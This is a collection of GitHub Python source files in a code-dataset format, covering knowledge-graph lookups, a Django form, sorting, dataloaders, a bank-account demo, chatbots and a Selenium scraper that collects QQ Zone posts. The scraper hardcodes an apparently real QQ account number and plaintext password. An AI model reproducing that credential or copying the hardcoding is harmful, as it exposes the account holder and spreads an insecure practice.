p['propertyLabel']['value'],\n 'description': p['propertyDescription']['value'] if 'propertyDescription' in p else None,\n 'aliases': p['propertyAltLabel']['value'].split(',') if 'propertyAltLabel' in p else []\n } for p in sparql_results\n ]\n with open (cached_props_path, 'w') as fp:\n json.dump(props, fp)\n return props\n\n def _formatter_urls(self, g):\n '''Get all formatter URLs for graph for converting external entity IDs to full URL'''\n cached_path = f'mappings/{g[\"ns\"]}-formatter-urls.json'\n if os.path.exists(cached_path):\n with open (cached_path, 'r') as fp:\n formatter_urls = json.load(fp)\n return formatter_urls\n else:\n for prop, value in self.prop_mappings[g['ns']].items():\n if value['label'] == 'formatter URL':\n break\n sparql = '''\n SELECT ?entity ?label ?formatterURL WHERE {\n ?entity wdt:%s ?formatterURL ;\n rdfs:label ?label .\n FILTER(LANG(?label) = 'en')\n }''' % (prop)\n sparql_results = requests.post(\n g['sparql_endpoint'],\n headers={\n 'Accept': 'application/sparql-results+json',\n 'Content-type': 'application/x-www-form-urlencoded',\n 'User-agent': 'JSTOR Labs python client'},\n data='query=%s' % quote(sparql)\n ).json()['results']['bindings']\n formatter_urls = [\n {\n 'id': p['entity']['value'].split('/')[-1],\n 'label': p['label']['value'],\n 'url': p['formatterURL']['value']\n } for p in sparql_results\n ]\n with open (cached_path, 'w') as fp:\n json.dump(formatter_urls, fp)\n return formatter_urls\n\n def _add_summary_text(self, entity, project=None, article=None, **kwargs):\n '''Finds and adds summary data for entity. For Wikidata entities the summary data is obtained\n from the Wikipedia article linked to the entity in the graph, if any. For entities in the JSTOR\n graph the summary data (if any) is referenced by the \"described at URL\" property'''\n logger.info(f'_add_summary_text: id={entity.get(\"id\")} project={project} article={article}')\n summary_url = None\n if article:\n summary_url = f'https://{self.acct}.github.io/{self.repo}/articles/{article}.md'\n elif entity.get('id'):\n if 'described at URL' in entity['claims']:\n for stmt in entity['claims']['described at URL']:\n # Ignore summary data associated with a specific project unless the\n # property code is proided as a method argument\n if not _is_entity_id(stmt['value'].split('/')[-1], False):\n if project:\n if project in stmt.get('qualifiers',{}).get('project code',[]):\n summary_url = stmt['value']\n else:\n if 'project code' not in stmt.get('qualifiers', {}):\n summary_url = stmt['value']\n elif entity['id'].startswith('wd:'):\n g = [g for g in GRAPHS if g['ns'] == 'wd'][0]\n sparql = '''\n SELECT ?mwPage {\n ?mwPage schema:about %s .\n ?mwPage schema:isPartOf .\n }''' % (entity['id'])\n resp = requests.post(\n g['sparql_endpoint'],\n headers={\n 'Accept': 'application/sparql-results+json;charset=UTF-8',\n 'Content-type': 'application/x-www-form-urlencoded',\n 'User-agent': 'JSTOR Labs python client'},\n data='query=%s' % quote(sparql)\n )\n if resp.status_code == 200:\n resp = resp.json()\n if resp['results']['bindings']:\n summary_url = resp['results']['bindings'][0]['mwPage']['value']\n else:\n logger.info(f'_add_summary_text: resp_code={resp.status_code} msg={resp.text}')\n\n if summary_url:\n page = summary_url.replace('/w/', '/wiki/').split('/wiki/')[-1]\n if 'wikipedia.org/wiki/' in summary_url:\n # Summary data from Wikipedia comes back nicely formatted. We just add it to the entity\n entity['summary info'] = requests.get(\n f'https://en.wikipedia.org/api/rest_v1/page/summary/{page}',\n headers={'User-agent': 'JSTOR Labs python client'},\n ).json()\n elif 'kg.jstor.org/wiki' in summary_url:\n # We need to create formatted summary data from the wikitext in the referenced mediawiki page\n # Any data extracted is used to update the Wikidata/Wikipedia summary data, if found. Currently\n # this just includes the extract text in raw and HTML\n resp = requests.get(f'https://kg.jstor.org/w/api.php?action=parse&format=json&page={page}').json()\n html = BeautifulSoup(resp['parse']['text']['*'], 'html5lib')\n extract = html.find('p')\n if extract:\n entity['summary info'] = {\n 'extract_html': str(extract).replace('\\n',''),\n 'extract': extract.text.strip()\n }\n else:\n logger.info(summary_url)\n md = requests.get(summary_url).content.decode('utf-8')\n html = markdown_parser.markdown(md, output_format='html5')\n soup = BeautifulSoup(html, 'html5lib')\n paragraphs = ['\\n'.join(p.contents) for p in soup.find_all('p')]\n logger.info('\\f'.join(paragraphs))\n entity['summary info'] = {'extract_html': '

'.join(paragraphs)}\n\n def _find_ids(self, entity):\n ids = set()\n self._find_ids_recursive(entity, ids)\n return ids\n\n def _find_ids_recursive(self, d, ids):\n if not isinstance(d, (dict, list, str)):\n return ids\n if isinstance(d, str):\n if _is_entity_id(d):\n ids.add(d)\n elif isinstance(d, list):\n for v in d:\n self._find_ids_recursive(v, ids)\n else: # a dict\n for v in d.values():\n self._find_ids_recursive(v, ids)\n\n def _add_id_labels(self, d, fingerprints):\n if not isinstance(d, (dict, list, str)):\n return d\n if isinstance(d, str):\n if _is_entity_id(d):\n if d in fingerprints:\n ns, qid = d.split(':')\n label = fingerprints[d]['label']\n g = [g for g in GRAPHS if g['ns'] == ns][0]\n url = f'{g[\"baseurl\"]}/{qid}'\n d = {'id': d, 'value': label, 'url': url}\n return d\n elif isinstance(d, list):\n return [v for v in (self._add_id_labels(v, fingerprints) for v in d) if v]\n return {k: v for k, v in ((k, self._add_id_labels(v, fingerprints)) for k, v in d.items()) if v}\n\n\ndef _is_entity_id(s, ns_required=True):\n if not s or not isinstance(s, str): return False\n eid = s.split(':')\n if len(eid) == 1 and ns_required:\n return False\n if len(eid) == 2 and eid[0] not in NAMESPACES:\n return False\n if len(eid) > 2:\n return False\n return len(eid[-1]) > 1 and eid[-1][0] in ('Q', 'P') and eid[-1][1:].isdecimal()\n\ndef usage():\n print('%s [hl:jrp:] qid' % sys.argv[0])\n print(' -h --help Print help message')\n print(' -l --loglevel Logging level (default=warning)')\n print(' -j --raw Return raw jsonld')\n print(' -r --refresh Refresh cache')\n print(' -p --project Entity context')\n\nif __name__ == '__main__':\n logger.setLevel(logging.WARNING)\n kwargs = {}\n try:\n opts, args = getopt.getopt(\n sys.argv[1:], 'hl:jrp:', ['help', 'loglevel', 'raw', 'refresh', 'project'])\n except getopt.GetoptError as err:\n # print help information and exit:\n print(str(err)) # will print something like \"option -a not recognized\"\n usage()\n sys.exit(2)\n\n for o, a in opts:\n if o in ('-l', '--loglevel'):\n loglevel = a.lower()\n if loglevel in ('error',): logger.setLevel(logging.ERROR)\n elif loglevel in ('warn','warning'): logger.setLevel(logging.INFO)\n elif loglevel in ('info',): logger.setLevel(logging.INFO)\n elif loglevel in ('debug',): logger.setLevel(logging.DEBUG)\n elif o in ('-j', '--raw'):\n kwargs['raw'] = True\n elif o in ('-r', '--refresh'):\n kwargs['refresh'] = True\n elif o in ('-p', '--project'):\n kwargs['project'] = a\n elif o in ('-h', '--help'):\n usage()\n sys.exit()\n else:\n assert False, \"unhandled option\"\n\n kg = KnowledgeGraph(**kwargs)\n\n if args:\n kwargs['uri'] = as_uri(args[0])\n print(json.dumps(kg.entity(**kwargs)))\n else:\n usage()\n sys.exit()\n","repo_name":"camilouribebotta/visual-essays","sub_path":"service/src/entity.py","file_name":"entity.py","file_ext":"py","file_size_in_byte":20271,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"33412324498","text":"from django.forms import ModelForm\n\nfrom .models import UrFUProfile\n\n\nclass UrFUProfileForm(ModelForm):\n\n def __init__(self, *args, **kwargs):\n super(UrFUProfileForm, self).__init__(*args, **kwargs)\n self.fields['SNILS'].error_messages = {\n \"required\": u\"Введите СНИЛС\",\n \"invalid\": u\"Некорректно\",\n }\n self.fields['specialty'].error_messages = {\n \"required\": u\"Введите специальность (направление подготовки)\",\n \"invalid\": u\"Некорректно\",\n }\n\n class Meta:\n model = UrFUProfile\n fields = ['last_name', 'first_name', 'second_name', 'phone', 'SNILS', 'specialty', 'country', 'education_level',\n 'job', 'position', 'birth_date']\n","repo_name":"umnoc/umnoc-edx","sub_path":"umnoc/profiles/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"ru","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"17133571654","text":"# -*- coding:utf-8 -*-\nimport requests\nimport os,time,sys\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport pandas as pd\nfrom tqdm import tqdm\n\n# 登陆\ndef logIn(name,pw):\n global driver\n driver.get('http://i.qq.com/')\n driver.maximize_window()\n driver.switch_to_frame(driver.find_element_by_id('login_frame'))\n upElement = driver.find_element_by_id('switcher_plogin')\n upElement.click()\n #输入账号密码,以及submit\n uElement = driver.find_element_by_id('u')\n pElement = driver.find_element_by_id('p') \n uElement.clear() \n uElement.send_keys(name)\n pElement.clear()\n pElement.send_keys(pw)\n time.sleep(1)\n loginB = driver.find_element_by_id('login_button')\n loginB.click()\n time.sleep(1)\n if driver.current_url == \"http://user.qzone.qq.com/\"+name:\n print ('登陆成功!')\n else:\n print ('登陆失败,登录到'+driver.current_url)\n print ('请重新登陆 ')\n logIn(name,pw)\n\n\n# 获得说说的页数\ndef allPages():\n global driver\n # 默认driver.switch_to_frame(driver.find_element_by_class_name('app_canvas_frame'))\n try:\n element = WebDriverWait(driver,10).until(\n EC.presence_of_element_located((By.ID,'_pager_content_0'))\n )\n except:\n print ('allPages错误')\n return None\n else:\n driver.find_element_by_id('_pager_content_0')\n bsPaperNum = BeautifulSoup(driver.page_source,'lxml')\n return int(bsPaperNum.find('a',title=\"下一页\").previous_sibling.get_text())\n\n# 切换到下一页\ndef nextPage(i):\n global driver\n # 默认driver.switch_to_frame(driver.find_element_by_class_name('app_canvas_frame'))\n try:\n element = WebDriverWait(driver,10).until(\n EC.element_to_be_clickable((By.ID,'pager_next_'+str(i)))\n )\n except:\n return None\n else:\n driver.find_element_by_id('pager_next_'+str(i)).click()\n return 1\n\n# 获得这一页上面的说说信息\ndef onePageInfo():\n # 默认driver.switch_to_frame(driver.find_element_by_class_name('app_canvas_frame'))\n global driver\n bsObj = BeautifulSoup(driver.page_source,'lxml')\n times_contents = [[li0.find('a',class_='c_tx3').get_text(),li0.find('pre',class_='content').get_text()] \\\n for li0 in bsObj.findAll('li',class_='feed')]\n return times_contents\n\n# 获得所有页面上的信息\ndef allPageInfo(query_name):\n global driver\n shuoshuo_index_url = \"http://user.qzone.qq.com/\"+query_name+'/311'\n driver.get(shuoshuo_index_url)\n #首先判断是不是有访问权限\n b0 = BeautifulSoup(driver.page_source,'lxml')\n if b0.find('p',class_='tips').get_text()==\"主人设置了权限,您可通过以下方式访问\":\n return None\n #进入主要的iframe\n try:\n element = WebDriverWait(driver,10).until(\n EC.presence_of_element_located((By.CLASS_NAME,'app_canvas_frame'))\n )\n except TimeoutException:\n print ('初始化错误')\n else:\n driver.switch_to_frame(driver.find_element_by_class_name('app_canvas_frame'))\n allPagesNum = allPages()\n #开始提取信息\n TIMES_CONSTENTS = []\n for i in tqdm(range(allPagesNum)):\n # sys.stdout.write('\\b\\b开始第'+str(i+1)+'页的收集')\n # sys.stdout.flush()\n times_contents = onePageInfo()\n TIMES_CONSTENTS+=times_contents\n if i != allPagesNum-1:\n if nextPage(i)==None:\n print ('nextPage出错'+str(i))\n break\n print ('全部结束','共搜集了',allPagesNum,'页数据;共有',len(TIMES_CONSTENTS),'篇说说。')\n return TIMES_CONSTENTS\n\n\n\n# 将信息保存到本地\ndef write2csv(TIMES_CONSTENTS,dest='test.csv'):\n p = pd.DataFrame(TIMES_CONSTENTS)\n p.to_csv(dest,index=False,header=['time','content'])\n print ('csv文件被写到:',os.getcwd()+'/'+dest)\n\n\n\nif __name__ == '__main__':\n #初始化\n driver = webdriver.PhantomJS('/usr/local/phantomjs/bin/phantomjs')\n driver.implicitly_wait(1)\n # name = input('请输入登陆用的qq号:')\n # pw = input('请输入对应的qq密码:')\n name = '771657815'\n pw = 'ygy433991100'\n logIn(name,pw)\n query_name = input('请输入查询说说的qq账号:')\n TIMES_CONSTENTS = allPageInfo(query_name)\n if TIMES_CONSTENTS==None:\n print ('没有该qq的访问权限')\n else:\n dest= input('输入保存的地址:')\n write2csv(TIMES_CONSTENTS,dest=dest)\n\n\n\n\n","repo_name":"YoungGer/ScrapingPractice","sub_path":"QQ说说_py3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73978020648","text":"array = [64, 21, 43, 46]\n\n#### ALGORITHM START\n\n# Loop through the array starting at the \n# first index and ending at the second to last\nfor i in range(len(array)-1): \n # Set the index with the smallest value to\n # our current i value\n index_smallest_num = i \n \n # Now we can compare our smallestIndex (i)\n # with every other element in the array.\n # We start with the value next to i which\n # is i + 1\n for j in range(i+1, len(array)): \n if array[index_smallest_num] > array[j]: \n index_smallest_num = j \n\n # Swap the elements i and smallestIndex are\n # pointing to\n array[i], array[index_smallest_num] = array[index_smallest_num], array[i]\n\n\n#### ALGORITHM END\n\n\nprint(array)","repo_name":"jayaike/Tutorials","sub_path":"Algorithms/Selection Sort/selection_sort_python.py","file_name":"selection_sort_python.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"3734595570","text":"from torch.utils.data import DataLoader\n\nfrom datasets import AudioDataset\nfrom utils import Collator, train_val_splitter\n\n\ndef create_dataloader(path, transform, batch_size=16):\n dataset = AudioDataset(path, transform=transform)\n train_dataset, validation_dataset = train_val_splitter(dataset)\n\n train_dataloader = DataLoader(\n train_dataset,\n batch_size=batch_size,\n shuffle=True,\n collate_fn=Collator(),\n )\n\n validation_dataloader = DataLoader(\n validation_dataset,\n batch_size=batch_size,\n shuffle=True,\n collate_fn=Collator(),\n )\n return train_dataloader, validation_dataloader\n","repo_name":"adolkhan/AudioMNIST","sub_path":"dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"19892583603","text":"from BankAccount import BankAccount\n\n# the objects from BankAccount class are in this class because I realised that\n# importing a class doesn't automatically import its objects\nclient1 = BankAccount(30, \"Kundai\", \"3A\")\nclient2 = BankAccount(30, \"Jane\", \"3B\")\nclient3 = BankAccount(30, \"Tanu\", \"3C\")\nclient4 = BankAccount(30, \"Eli\", \"3D\")\nclient5 = BankAccount(30, \"Sarah\", \"3E\")\n\n# They all have a initial bank deposit of 30 dollars.\n# The bank requires a new account holder to have an initial deposit of 30 dollars.\n\n# the menu function contains instruction on how to perform an action.\n\n\ndef menu():\n print(\"Enter 1 if you want to view your account details\")\n print(\"Enter 2 if you want to withdraw money from your account.\")\n print(\"Enter 3 is you want to deposit money into your account.\")\n print(\"Enter 4 if you want to transfer money to another person who holds an account in this bank.\")\n print(\"Enter 5 if you want to exit.\")\n\n# the display_menu function contains instructions for the program to follow depending on\n# who the owner of the account is.\n# the owner inputs their account number instead of their names since no two people can have the same account number.\n\n\ndef display_money():\n identity = input(\"To log into your account please input your account number: \")\n\n if identity == \"3A\":\n client1.display()\n elif identity == \"3B\":\n client2.display()\n elif identity == \"3C\":\n client3.display()\n elif identity == \"3D\":\n client4.display()\n elif identity == \"3E\":\n client5.display()\n else:\n print(\"Invalid account number. Please input your account number.\")\n\n# the withdraw_cash function contains instructions for the program to follow depending on\n# who the owner of the account is.\n\n\ndef withdraw_cash():\n identity = input(\"To log into your account please input your account number: \")\n if identity == \"3A\":\n client1.withdraw()\n elif identity == \"3B\":\n client2.withdraw()\n elif identity == \"3C\":\n client3.withdraw()\n elif identity == \"3D\":\n client4.withdraw()\n elif identity == \"3E\":\n client5.withdraw()\n else:\n print(\"Invalid account number. Please input your account number.\")\n\n# the deposit_cash function contains instructions for the program to follow depending on\n# who the owner of the account is.\n\n\ndef deposit_cash():\n identity = input(\"To log into your account please input your account number: \")\n if identity == \"3A\":\n client1.deposit()\n elif identity == \"3B\":\n client2.deposit()\n elif identity == \"3C\":\n client3.deposit()\n elif identity == \"3D\":\n client4.deposit()\n elif identity == \"3E\":\n client5.deposit()\n else:\n print(\"Invalid account number. Please input the correct account number for your bank account.\")\n\n# used the while loop to keep on prompting the user if he wants to perform any action.\n# used the exit function to break out of the loop when the user does not want to perform any function.\n\n\nwhile True:\n user = input(\"Do you want to perform any action? \").lower()\n # used conditional statements to control the flow of the program.\n if user == \"yes\":\n menu()\n choice = int(input(\"What choice do you want?: \"))\n if choice == 1:\n display_money()\n elif choice == 2:\n withdraw_cash()\n elif choice == 3:\n deposit_cash()\n elif choice == 4:\n client1.transfer()\n elif choice == 5:\n exit()\n else:\n print(\"Choice selected is unrecognised.\")\n else:\n exit()\n","repo_name":"Kundai10/OnlineBank","sub_path":"BankAccount_Part2.py","file_name":"BankAccount_Part2.py","file_ext":"py","file_size_in_byte":3630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26204095635","text":"# Crea un programa que invierta el orden de una cadena de texto\n# sin usar funciones propias del lenguaje que lo hagan de forma automática.\n# - Si le pasamos \"Hola mundo\" nos retornaría \"odnum aloH\"\n\ncadena = input('Introduzca cadena de texto a invertir: ')\n\ncadena_inv = list(cadena)\ncadena_inv = \"\".join(cadena_inv[::-1])\n\nprint(cadena_inv)\n","repo_name":"gusavato/Retos_mouredev","sub_path":"6_Invirtiendo_cadenas.py","file_name":"6_Invirtiendo_cadenas.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"35897007554","text":"def check_speed(speed=0):\n if speed > 70:\n delta = speed - 70\n points = int(delta / 5)\n if points > 11:\n print(\"Police: License suspended boy!\")\n else:\n print(\"Police: You went so fast! You have to pay a tax of {} points\".format(points))\n else:\n print(\"Police: Okey, continue\")\n \ncheck_speed(600)\n \n","repo_name":"bd52622020/appSpaceJavier","sub_path":"Task3_Python_WarmUp/A3_Speed_drivers.py","file_name":"A3_Speed_drivers.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16392178023","text":"from torch.utils.data import Dataset\nimport torch\nimport random\nimport pandas as pd\nimport numpy as np\nfrom numba import jit\nimport pickle\n\n\nclass DatasetSeqLM(Dataset):\n def __init__(self, corpus_path, seq_len):\n # self.vocab = vocab\n amino_acids = pd.read_csv('data/amino_acids.csv')\n self.vocab = {x: y for x, y in zip(amino_acids.AA, amino_acids.idx)}\n self.vocab['pad_index'] = 0\n # self.vocab['mask_index'] = 21\n self.vocab['sos_index'] = 21\n # self.vocab['eos_index'] = 23\n self.vocab['unk_index'] = 22\n\n self.seq_len = seq_len\n # self.corpus_path = corpus_path\n\n df = pd.read_csv(corpus_path)\n # df.sort_values(by='seq', ascending=True, inplace=True)\n self.seq = df['seq_unalign'].values\n self.slen = df['seq_len'].values\n self.num_seq = len(self.slen)\n\n # with open(corpus_path, \"r\") as f:\n # self.seq = [line[:-1] for line in f]\n # self.num_seq = len(self.seq)\n\n def __len__(self):\n return self.num_seq\n\n def __getitem__(self, item):\n t1 = self.seq[item]\n\n seq = self.tokenizer(t1)\n seq_x = [self.vocab['sos_index']] + seq[:-1]\n\n output = {\"seq\": seq,\n \"seq_x\": seq_x,\n }\n\n for key, value in output.items():\n # output[key] = torch.tensor(value, requires_grad=False)\n output[key] = torch.tensor(value)\n return output\n\n def tokenizer(self, sentence):\n tokens = list(sentence)\n for i, token in enumerate(tokens):\n try:\n tokens[i] = self.vocab[token]\n except KeyError:\n tokens[i] = self.vocab['unk_index']\n # crop long seq or pad short seq\n if len(tokens) > self.seq_len:\n tokens = tokens[0:self.seq_len]\n else:\n padding = [self.vocab['pad_index'] for _ in range(self.seq_len - len(tokens))]\n tokens.extend(padding)\n return tokens\n\n\nif __name__ == '__main__':\n # dataset = DatasetSeqLM('data/pf00400_unalign_clean_train.txt', seq_len=50)\n dataset = DatasetSeqLM('data/seq_unalign_indel_all_cut_sample.csv', seq_len=256)\n\n\n\n","repo_name":"lahplover/unippi","sub_path":"data/seq_lm_dataset.py","file_name":"seq_lm_dataset.py","file_ext":"py","file_size_in_byte":2209,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"8016572499","text":"from __future__ import absolute_import, division, print_function, unicode_literals\r\nimport numpy as np\r\n\r\nclass Normalizer:\r\n\tdef __init__(self, vmin, vmax, clip=False):\r\n\t\tself.vmin = vmin\r\n\t\tself.vmax = vmax\r\n\t\tself.clip = clip\r\n\r\n\tdef copyAndClip(self, A):\r\n\t\tif self.clip:\r\n\t\t\tA = np.clip(A, self.vmin, self.vmax)\r\n\t\telse:\r\n\t\t\tA = A.copy()\r\n\t\treturn A\r\n\r\nclass Normalize(Normalizer):\r\n\tdef Normalize(self, A, scale=1):\r\n\t\tA = self.copyAndClip(A)\r\n\t\tA -= self.vmin\r\n\t\tA *= scale / (self.vmax - self.vmin)\r\n\t\treturn A\r\n\r\n\r\nclass LogNorm(Normalizer):\r\n\tdef Normalize(self, A, scale=1):\r\n\t\tA = self.copyAndClip(A)\r\n\t\tnp.log(A, out=A)\r\n\t\tA -= np.log(self.vmin)\r\n\t\tA *= scale / np.log(self.vmax/self.vmin)\r\n\t\treturn A\r\n","repo_name":"Geocene/cookstove_test_tracker","sub_path":"Current/mpl/colors.py","file_name":"colors.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32073592306","text":"'''\r\nCreated on Feb 18, 2019\r\n\r\n@author: subharad\r\n'''\r\nfrom selenium import webdriver\r\nfrom test_login import Login\r\nfrom test_homepage import homepage\r\nimport unittest\r\nimport time\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nclass LoginTest(unittest.TestCase):\r\n \r\n @classmethod\r\n def setUpClass(cls):\r\n super(LoginTest, cls).setUpClass()\r\n cls.driver = webdriver.Chrome(\"C:\\selenium_scripts\\Selenium\\driver\\chromedriver.exe\")\r\n #cls.driver.implicitly_wait(10)\r\n cls.driver.maximize_window()\r\n \r\n \r\n def test_appointment_submit(self):\r\n driver = self.driver\r\n login = Login(driver)\r\n login.login()\r\n apt =homepage(driver)\r\n apt.click_appointment()\r\n try:\r\n apt.delete_btn()\r\n time.sleep(2)\r\n apt.delete_yes_message()\r\n time.sleep(2)\r\n except:\r\n print(\"no entries to delete\")\r\n \r\n \r\n \r\n \r\n \r\n @classmethod\r\n def tearDownClass(cls):\r\n super(LoginTest, cls).tearDownClass()\r\n cls.driver.close()\r\n cls.driver.quit()","repo_name":"SudhanvaRB/SeleniumProjects","sub_path":"Selenium/Pytest/vims_unitest.py","file_name":"vims_unitest.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8002127201","text":"import os\nimport openai\n\nfrom fastapi import FastAPI, Request, Form\nfrom fastapi.templating import Jinja2Templates\nfrom fastapi.staticfiles import StaticFiles\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\napp = FastAPI()\ntemplates = Jinja2Templates(directory=\"templates\")\n\napp.mount(\"/static\", StaticFiles(directory=\"static\"), name=\"static\")\n\n# Establece tu API key de OpenAI\nopenai.api_key = os.getenv('API_KEY')\n\n\n# Función para generar una respuesta a partir de un prompt\ndef generate_response(prompt):\n response = openai.Completion.create(\n engine=\"text-davinci-003\",\n prompt=prompt,\n max_tokens=2048,\n n=1,\n stop=None,\n temperature=0.5,\n )\n return response.choices[0].text.strip()\n\n\n# Ruta principal del sitio web\n@app.get(\"/\")\nasync def index(request: Request):\n return templates.TemplateResponse(\"index.html\", {\"request\": request})\n\n\n# Ruta para procesar la entrada del usuario y generar una respuesta\n@app.post(\"/chat\")\nasync def chat(request: Request, message: str = Form(...)):\n prompt = f\"Usuario: {message}\\nJarvis:\"\n response = generate_response(prompt)\n return templates.TemplateResponse(\"index.html\", {\"request\": request, \"message\": message, \"response\": response})\n","repo_name":"ChristianMallma/jarvis-project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15982197808","text":"with open('day13.txt') as f:\n lines = f.readlines()\n\ndef fold_on_y(matrix, coord):\n for x in range(len(matrix[0])):\n assert(matrix[coord][x] == 0)\n start_y= coord - (len(matrix) - coord - 1)\n for y in range(start_y, coord):\n for x in range(len(matrix[0])):\n matrix[y][x] |= matrix[len(matrix) - 1 - (y - start_y)][x]\n return matrix[0:coord]\n\ndef fold_on_x(matrix, coord):\n new_matrix = list()\n start_x = coord - (len(matrix[0]) - coord - 1)\n for y in range(len(matrix)):\n for x in range(start_x, coord):\n assert(matrix[y][coord] == 0)\n matrix[y][x] |= matrix[y][len(matrix[y]) - 1 - (x - start_x)]\n new_matrix.append(matrix[y][0:coord])\n return new_matrix\n\nxcoord = list()\nycoord = list()\nfold_index=0\nfor fold_index,line in enumerate(lines):\n if line == \"\\n\":\n break\n xcoord.append(int(line.rstrip().split(\",\")[0]))\n ycoord.append(int(line.rstrip().split(\",\")[1]))\n\nfolds = list()\nfor index in range(fold_index+1, len(lines)):\n fold_info = lines[index].rstrip().split()[2]\n folds.append((fold_info.split(\"=\")[0], int(fold_info.split(\"=\")[1])))\n\n\n\nmatrix = [[0] * (max(xcoord)+1) for _ in range(max(ycoord)+1)]\n\nfor x,y in zip(xcoord, ycoord):\n matrix[y][x] = 1\n\nfirst_fold = folds.pop(0)\nif first_fold[0] == \"y\":\n matrix = fold_on_y(matrix, first_fold[1])\n\nif first_fold[0] == \"x\":\n matrix = fold_on_x(matrix, first_fold[1])\n\nno_dots=0\nfor line in matrix:\n for dot in line:\n no_dots += dot\n\nprint(f\"part1: {no_dots}\")\n\nfor fold in folds:\n if fold[0] == \"y\":\n matrix = fold_on_y(matrix, fold[1]).copy()\n elif fold[0] == \"x\":\n matrix = fold_on_x(matrix, fold[1]).copy()\n else:\n assert(False)\nprint(\"part2: \")\nfor line in matrix:\n print(\"\".join([\"#\" if entry == 1 else \".\" for entry in line]))\n\n","repo_name":"tuze-scanreach/aoc2021","sub_path":"day13.py","file_name":"day13.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22528896647","text":"import telebot\nfrom telebot import types\nimport sql.use_sql as sql\nimport random\nimport config\n\nLEARN = 5\nbot = telebot.TeleBot(config.TOKEN)\nACCEPT_MESSAGES = ['Правильно, умница! 😎', 'Excellent job! 🥳', 'Молодец, так держать! 🤓',\n 'Правильный ответ, крутяк! 🤩']\nTRY_AGAIN = ['Попробуй ввести снова 🥺', 'Попробуй снова 😣', 'Ты ошибся, подумай лучше! 😖']\n\n\ndef is_learned(tg_id, word_id):\n \"\"\"\n Проверяет слово выучено пользователем или нет.\n :param tg_id:\n :param word_id:\n :return: true(learned)/false(not learned)\n \"\"\"\n notes = sql.notes_by_user_and_word(tg_id, word_id)\n if notes == []:\n return False\n elif len(notes) == 1 and notes[0][3] == 'GENERATED':\n return False\n else:\n return True\n\n\ndef generate_word(tg_id):\n \"\"\"\n Генерирует новое слово, проверяя его на то что оно уже выучено, если выучено то генерируется новое.\n :param tg_id:\n :return: word (tuple): (word_id, word_en, word_ru, category, sentence, hate)\n \"\"\"\n # TODO (@Олеся)\n flag = 0\n words = sql.all_words()\n while flag == 0:\n word = random.choice(words)\n if not is_learned(tg_id, word[0]):\n flag = 1\n return word\n\n\ndef send_new_word(tg_id):\n \"\"\"\n Генерирует новое слово\n Отправляет юзеру это слово\n :param tg_id:\n :return:\n \"\"\"\n if sql.user_info(tg_id)['cnt_words_today'] == 10:\n markup = types.InlineKeyboardMarkup()\n markup.add(types.InlineKeyboardButton(text='Главное меню 🪴', callback_data='menu'))\n bot.send_message(chat_id=tg_id, text=f'Сегодня ты уже выучил 10 слов. Возвращайся завтра! 😉', reply_markup=markup)\n else:\n word = generate_word(tg_id)\n sql.add_new_note(tg_id, word[0], sql.GENERATED, None)\n sql.set_new_word_id(tg_id, word[0])\n my_words = generate_choice(word[0])\n markup = types.InlineKeyboardMarkup()\n item1 = types.InlineKeyboardButton(text=word[2], callback_data='accept')\n item2 = types.InlineKeyboardButton(text=my_words[1][1], callback_data='wrong')\n item3 = types.InlineKeyboardButton(text=my_words[2][1], callback_data='wrong')\n item4 = types.InlineKeyboardButton(text=my_words[3][1], callback_data='wrong')\n item5 = types.InlineKeyboardButton(text='Главное меню 🪴', callback_data='menu')\n spisok = [item4, item3, item2, item1]\n random.shuffle(spisok)\n spisok.append(item5)\n for i in spisok:\n markup.add(i)\n bot.send_message(chat_id=tg_id, text=f'Твое слово: {word[1]} 🎓\\n\\nВыбери правильный вариант ответа:',\n reply_markup=markup)\n\n\ndef generate_choice(word_id):\n \"\"\"\n Generate 3 wrong answer\n :param word_id:\n :return: list(of 4 tuples(word_id, word_ru, word_en, 1-correct answer, 0-wrong answer))\n \"\"\"\n list_of_selected_words = [word_id]\n list_of_words = [(word_id, sql.word_info(word_id)[2], sql.word_info(word_id)[1], 1)]\n while len(list_of_words) < 4:\n wrong_word = random.choice(sql.all_words())\n if wrong_word[0] not in list_of_selected_words:\n list_of_words.append((wrong_word[0], wrong_word[2], wrong_word[1], 0))\n list_of_selected_words.append(wrong_word[0])\n return list_of_words\n\n\ndef generate_repeat_word(tg_id):\n \"\"\"\n выбирает слово для повторения\n :param tg_id:\n :return: word_id:\n \"\"\"\n notes = sql.notes_by_user(tg_id)\n all_retry_words = set()\n for note in notes:\n if note[3] == 